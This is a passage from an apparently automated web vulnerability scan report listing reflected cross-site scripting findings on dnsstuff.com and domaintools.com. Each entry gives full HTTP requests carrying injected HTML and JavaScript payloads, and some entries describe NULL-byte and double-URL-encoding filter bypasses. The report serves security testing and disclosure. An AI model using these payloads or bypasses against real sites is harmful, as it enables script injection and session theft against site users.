The value of the tool_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dca4b"><img%20src%3da%20onerror%3dalert(1)>cbe6d23089b was submitted in the tool_id parameter. This input was echoed as dca4b\"><img src=a onerror=alert(1)>cbe6d23089b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tools/ipall/?tool_id=67dca4b"><img%20src%3da%20onerror%3dalert(1)>cbe6d23089b&token=&toolhandler_redirect=0&ip=209.235.10.84 HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.1.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:03:25 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Jul 2011 02:03:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14033
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<script type="text/java
...[SNIP]...
<a id="emailResultsLinkNoJS" href="http://www.dnsstuff.com/tools/ipall?tool_id=67dca4b\"><img src=a onerror=alert(1)>cbe6d23089b&token=&toolhandler_redirect=0&ip=209.235.10.84&quot;=&gt;=&lt;img_src=a onerror=alert(1)&gt;cbe6d23089b=">
...[SNIP]...

3.97. http://www.dnsstuff.com/tools/ipall/ [toolhandler_redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dnsstuff.com
Path:   /tools/ipall/

Issue detail

The value of the toolhandler_redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8abba"><img%20src%3da%20onerror%3dalert(1)>d7e87e019ab was submitted in the toolhandler_redirect parameter. This input was echoed as 8abba\"><img src=a onerror=alert(1)>d7e87e019ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tools/ipall/?tool_id=67&token=&toolhandler_redirect=08abba"><img%20src%3da%20onerror%3dalert(1)>d7e87e019ab&ip=209.235.10.84 HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.1.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:04:18 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Jul 2011 02:04:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14033
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<script type="text/java
...[SNIP]...
<a id="emailResultsLinkNoJS" href="http://www.dnsstuff.com/tools/ipall?tool_id=67&token=&toolhandler_redirect=08abba\"><img src=a onerror=alert(1)>d7e87e019ab&ip=209.235.10.84&quot;=&gt;=&lt;img_src=a onerror=alert(1)&gt;d7e87e019ab=">
...[SNIP]...

3.98. http://www.dnsstuff.com/tools/ipall/a [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dnsstuff.com
Path:   /tools/ipall/a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006db6b"><a>5598c7bc19e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6db6b\"><a>5598c7bc19e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /tools/ipall/a?%006db6b"><a>5598c7bc19e=1 HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67dca4b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ecbe6d23089b&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.3.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=629fad8433489d10f91fe22b85337a2c; ID=f3d6c1ad003861

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:10:13 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Jul 2011 02:10:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13835
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<script type="text/java
...[SNIP]...
<a id="emailResultsLinkNoJS" href="http://www.dnsstuff.com/tools/ipall?%006db6b\"><a>5598c7bc19e=1&quot;=&gt;=&lt;a=&gt;5598c7bc19e=1">
...[SNIP]...

3.99. http://www.dnsstuff.com/tools/ipall/a/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dnsstuff.com
Path:   /tools/ipall/a/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5380%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5b9d6639a3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5380\"><script>alert(1)</script>5b9d6639a3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tools/ipall/a/?a5380%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5b9d6639a3e=1 HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67dca4b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ecbe6d23089b&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.3.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=629fad8433489d10f91fe22b85337a2c; ID=f3d6c1ad003861

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:07:24 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Jul 2011 02:07:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13931
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<script type="text/java
...[SNIP]...
<a id="emailResultsLinkNoJS" href="http://www.dnsstuff.com/tools/ipall?a5380%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e5b9d6639a3e=1&a5380\"><script>alert(1)</script>5b9d6639a3e=1">
...[SNIP]...

3.100. http://www.domaintools.com/about/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc6d7<a>724f95e7d81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /aboutcc6d7<a>724f95e7d81/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:12:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:12:11 GMT
Content-Length: 12048
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>724f95e7d81">Whois record for "aboutcc6d7<a>724f95e7d81"</a>
...[SNIP]...

3.101. http://www.domaintools.com/about/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7bd0"><a>4b1c7fd1561 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /aboutf7bd0"><a>4b1c7fd1561/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:12:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:12:02 GMT
Content-Length: 12069
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=aboutf7bd0"><a>4b1c7fd1561">
...[SNIP]...

3.102. http://www.domaintools.com/about/big-changes/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/big-changes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1481f<a>167fa243eba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/big-changes1481f<a>167fa243eba/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:12:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:12:25 GMT
Content-Length: 12104
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>167fa243eba">Whois record for "big-changes1481f<a>167fa243eba"</a>
...[SNIP]...

3.103. http://www.domaintools.com/about/big-changes/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/big-changes/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65cb0"><a>c15207160e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/big-changes65cb0"><a>c15207160e9/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:12:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:12:14 GMT
Content-Length: 12125
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=big-changes65cb0"><a>c15207160e9">
...[SNIP]...

3.104. http://www.domaintools.com/about/contact-us/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/contact-us/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b40c8<a>b49c022f80c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/contact-usb40c8<a>b49c022f80c/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:12:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:12:44 GMT
Content-Length: 12096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>b49c022f80c">Whois record for "contact-usb40c8<a>b49c022f80c"</a>
...[SNIP]...

3.105. http://www.domaintools.com/about/contact-us/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/contact-us/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90a4b"><a>beacf8fc08f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/contact-us90a4b"><a>beacf8fc08f/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:12:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:12:32 GMT
Content-Length: 12117
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=contact-us90a4b"><a>beacf8fc08f">
...[SNIP]...

3.106. http://www.domaintools.com/about/features-and-pricing/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/features-and-pricing/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 238fa"><a>f3530ad6c99 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/features-and-pricing238fa"><a>f3530ad6c99/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:12 GMT
Content-Length: 12179
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=features-and-pricing238fa"><a>f3530ad6c99">
...[SNIP]...

3.107. http://www.domaintools.com/about/features-and-pricing/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/features-and-pricing/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23c97<a>9273ea8bed3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/23c97<a>9273ea8bed3/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:21 GMT
Content-Length: 12016
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>9273ea8bed3">Whois record for "23c97<a>9273ea8bed3"</a>
...[SNIP]...

3.108. http://www.domaintools.com/about/join-our-team/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/join-our-team/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5764"><a>00e59d41b90 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/join-our-teamc5764"><a>00e59d41b90/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:12:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:12:55 GMT
Content-Length: 12141
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=join-our-teamc5764"><a>00e59d41b90">
...[SNIP]...

3.109. http://www.domaintools.com/about/join-our-team/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/join-our-team/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5becf<a>884039f78e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/5becf<a>884039f78e1/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:07 GMT
Content-Length: 12016
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>884039f78e1">Whois record for "5becf<a>884039f78e1"</a>
...[SNIP]...

3.110. http://www.domaintools.com/about/learn-more/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/learn-more/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26e0d"><a>9bdccc00611 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/learn-more26e0d"><a>9bdccc00611/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:07 GMT
Content-Length: 12117
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=learn-more26e0d"><a>9bdccc00611">
...[SNIP]...

3.111. http://www.domaintools.com/about/learn-more/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/learn-more/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 372b9<a>a26dbc0dae9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/learn-more372b9<a>a26dbc0dae9/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:17 GMT
Content-Length: 12096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>a26dbc0dae9">Whois record for "learn-more372b9<a>a26dbc0dae9"</a>
...[SNIP]...
